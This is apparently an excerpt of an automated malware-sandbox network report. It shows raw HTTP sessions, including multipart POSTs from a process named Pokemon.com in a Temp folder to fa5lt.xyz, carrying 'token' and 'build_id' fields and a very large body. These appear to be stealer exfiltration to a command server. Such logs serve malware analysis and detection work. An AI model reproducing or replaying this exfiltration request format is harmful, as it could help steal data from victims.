                                                                                                                                                                                                                                                                                    2024-12-27 13:47:27 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 53 4a 57 34 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 0d 0a 2d 2d 2d 2d 2d 2d 53 4a 57 34 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 53 4a 57 34 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------SJW4W4OHLXBIEU3EUA1VContent-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------SJW4W4OHLXBIEU3EUA1VContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------SJW4W4OHLXBIEU3EUA1VCont
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:27 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:28 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    29192.168.2.54994523.200.88.94434028C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:27 UTC751OUTGET /statics/icons/favicon_newtabpage.png HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: assets.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: _C_ETH=1; USRLOC=; MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; _EDGE_S=F=1&SID=29785E8D998166DF1E074BEF98EF6757; _EDGE_V=1
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:28 UTC1004INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                                                    ETag: "bed4a7cc95f6106c7a3d46d2b50cb3f8:1614709529.490117"
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 02 Mar 2021 18:25:29 GMT
                                                                                                                                                                                                                                                                                    Server: AkamaiNetStorage
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:28 GMT
                                                                                                                                                                                                                                                                                    Content-Length: 354
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    Akamai-Request-BC: [a=23.200.89.137,b=774715594,c=g,n=US_NJ_SECAUCUS,o=20940]
                                                                                                                                                                                                                                                                                    Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
                                                                                                                                                                                                                                                                                    Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                    Akamai-Server-IP: 23.200.89.137
                                                                                                                                                                                                                                                                                    Akamai-Request-ID: 2e2d38ca
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Akamai-GRN: 0.8959c817.1735307248.2e2d38ca
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:28 UTC354INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 f7 49 44 41 54 78 01 ed 57 d1 0d 83 20 10 7d e9 04 8c d0 51 d8 a4 8e e0 06 32 42 37 b2 23 74 03 47 a0 1b b4 10 21 62 cb 79 ca d1 f8 c3 4b 5e 34 70 be 7b 22 07 08 34 fc 42 3b 8e 8e d6 f1 5d 91 5e f3 c6 25 1f 2a 27 cd 71 a0 92 77 49 90 71 54 44 5c 8c 39 02 af d5 27 cf ea 5c d0 18 3a 7b 46 ac c4 40 84 c1 f2 39 48 61 85 ff 19 50 e1 59 2b 11 8e 93 f3 8a 32 90 79 f6 1a 30 a8 33 19 8b 0d 78 dc 21 2f 53 91 01 09 56 79 2e 38 19 cd 40 33 b0 c7 c0 0d 73 c9 4d 58 ef 66 47 db 59 50 65 38 25 7d 56 d0 9e cd b3 67 04
                                                                                                                                                                                                                                                                                    Data Ascii: PNGIHDR szzpHYs%%IR$sRGBgAMAaIDATxW }Q2B7#tG!byK^4p{"4B;]^%*'qwIqTD\9'\:{F@9HaPY+2y03x!/SVy.8@3sMXfGYPe8%}Vg


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    30192.168.2.549972116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:28 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----M7YMGDTJM7G47Q16P8YU
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 6990993
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:28 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 37 59 4d 47 44 54 4a 4d 37 47 34 37 51 31 36 50 38 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 0d 0a 2d 2d 2d 2d 2d 2d 4d 37 59 4d 47 44 54 4a 4d 37 47 34 37 51 31 36 50 38 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4d 37 59 4d 47 44 54 4a 4d 37 47 34 37 51 31 36 50 38 59 55 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------M7YMGDTJM7G47Q16P8YUContent-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------M7YMGDTJM7G47Q16P8YUContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------M7YMGDTJM7G47Q16P8YUCont
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
